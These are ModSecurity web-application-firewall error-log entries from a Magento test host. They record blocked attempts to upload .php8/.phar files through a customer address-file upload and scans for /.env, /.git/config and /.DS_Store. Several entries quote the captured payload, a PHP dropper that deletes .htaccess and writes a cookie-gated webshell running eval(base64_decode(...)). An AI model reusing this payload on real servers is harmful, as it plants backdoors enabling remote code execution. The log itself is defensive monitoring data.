[Mon Nov 24 13:58:17.324053 2025] [:error] [pid 294797] [client 213.109.224.109:12099] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/v/qv88364f428d25.php8"] [unique_id "aSRWaQ4k_W94gZNW8aYItgAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:06.379910 2025] [:error] [pid 312403] [client 213.109.224.109:11380] [client 213.109.224.109] ModSecurity: Rule 7f831537dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.phar"] [unique_id "aSVKllSFSq9rh4KCg80EGgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:06.380426 2025] [:error] [pid 312403] [client 213.109.224.109:11380] [client 213.109.224.109] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.phar"] [unique_id "aSVKllSFSq9rh4KCg80EGgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:06.383231 2025] [:error] [pid 312403] [client 213.109.224.109:11380] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.phar"] [unique_id "aSVKllSFSq9rh4KCg80EGgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:06.383472 2025] [:error] [pid 312403] [client 213.109.224.109:11380] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.phar"] [unique_id "aSVKllSFSq9rh4KCg80EGgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:13.169777 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: z188364f428d25.php8 found within FILES:custom_attributes[country_id]: z188364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSVKnSFZTA23b-lP_bNzgwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/1/z188364f428d25.phar
[Tue Nov 25 07:20:13.170537 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSVKnSFZTA23b-lP_bNzgwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/1/z188364f428d25.phar
[Tue Nov 25 07:20:13.170726 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSVKnSFZTA23b-lP_bNzgwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/z/1/z188364f428d25.phar
[Tue Nov 25 07:20:13.675486 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Rule 7f831537dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.php8"] [unique_id "aSVKnSFZTA23b-lP_bNzhAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:13.676069 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.php8"] [unique_id "aSVKnSFZTA23b-lP_bNzhAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:13.678903 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.php8"] [unique_id "aSVKnSFZTA23b-lP_bNzhAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Nov 25 07:20:13.679155 2025] [:error] [pid 311066] [client 213.109.224.109:11810] [client 213.109.224.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/z/1/z188364f428d25.php8"] [unique_id "aSVKnSFZTA23b-lP_bNzhAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:07.781041 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Rule 7f8315853be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.phar"] [unique_id "aSZH87FZOwFJWrP860rzvAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:07.781595 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.phar"] [unique_id "aSZH87FZOwFJWrP860rzvAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:07.784040 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.phar"] [unique_id "aSZH87FZOwFJWrP860rzvAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:07.784257 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.phar"] [unique_id "aSZH87FZOwFJWrP860rzvAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:08.164984 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: dy88364f428d25.php8 found within FILES:custom_attributes[country_id]: dy88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSZH9LFZOwFJWrP860rzvQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/y/dy88364f428d25.phar
[Wed Nov 26 01:21:08.165683 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSZH9LFZOwFJWrP860rzvQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/y/dy88364f428d25.phar
[Wed Nov 26 01:21:08.165883 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSZH9LFZOwFJWrP860rzvQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/y/dy88364f428d25.phar
[Wed Nov 26 01:21:08.473322 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Rule 7f8315853be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.php8"] [unique_id "aSZH9LFZOwFJWrP860rzvgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:08.473797 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.php8"] [unique_id "aSZH9LFZOwFJWrP860rzvgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:08.476147 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.php8"] [unique_id "aSZH9LFZOwFJWrP860rzvgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 01:21:08.476346 2025] [:error] [pid 330381] [client 37.112.223.135:44000] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/y/dy88364f428d25.php8"] [unique_id "aSZH9LFZOwFJWrP860rzvgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Nov 26 08:23:14.022666 2025] [authz_core:error] [pid 332765] [client 146.190.63.248:33366] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 08:23:15.540583 2025] [:error] [pid 332947] [client 146.190.63.248:48122] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSaq46IAYfjGSdo5sO6DEQAAAAY"]
[Wed Nov 26 08:23:15.540942 2025] [:error] [pid 332947] [client 146.190.63.248:48122] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSaq46IAYfjGSdo5sO6DEQAAAAY"]
[Wed Nov 26 08:23:15.541184 2025] [:error] [pid 332947] [client 146.190.63.248:48122] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSaq46IAYfjGSdo5sO6DEQAAAAY"]
[Wed Nov 26 08:23:16.043984 2025] [:error] [pid 332763] [client 146.190.63.248:48126] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSaq5Ng2L5I3j1bw0PokzQAAAAA"]
[Wed Nov 26 08:23:16.044214 2025] [:error] [pid 332763] [client 146.190.63.248:48126] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSaq5Ng2L5I3j1bw0PokzQAAAAA"]
[Wed Nov 26 08:23:16.044380 2025] [:error] [pid 332763] [client 146.190.63.248:48126] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSaq5Ng2L5I3j1bw0PokzQAAAAA"]
[Wed Nov 26 08:23:16.545258 2025] [:error] [pid 334002] [client 146.190.63.248:48130] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSaq5PJt2cox8jom8lwRygAAAAg"]
[Wed Nov 26 08:23:16.545508 2025] [:error] [pid 334002] [client 146.190.63.248:48130] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSaq5PJt2cox8jom8lwRygAAAAg"]
[Wed Nov 26 08:23:16.545672 2025] [:error] [pid 334002] [client 146.190.63.248:48130] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSaq5PJt2cox8jom8lwRygAAAAg"]
[Wed Nov 26 18:19:36.120325 2025] [authz_core:error] [pid 336732] [client 157.230.19.140:55918] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 18:19:36.899286 2025] [:error] [pid 336729] [client 157.230.19.140:55948] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSc2qBYc3OAEw9RHe6IsQgAAAAo"]
[Wed Nov 26 18:19:36.899538 2025] [:error] [pid 336729] [client 157.230.19.140:55948] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSc2qBYc3OAEw9RHe6IsQgAAAAo"]
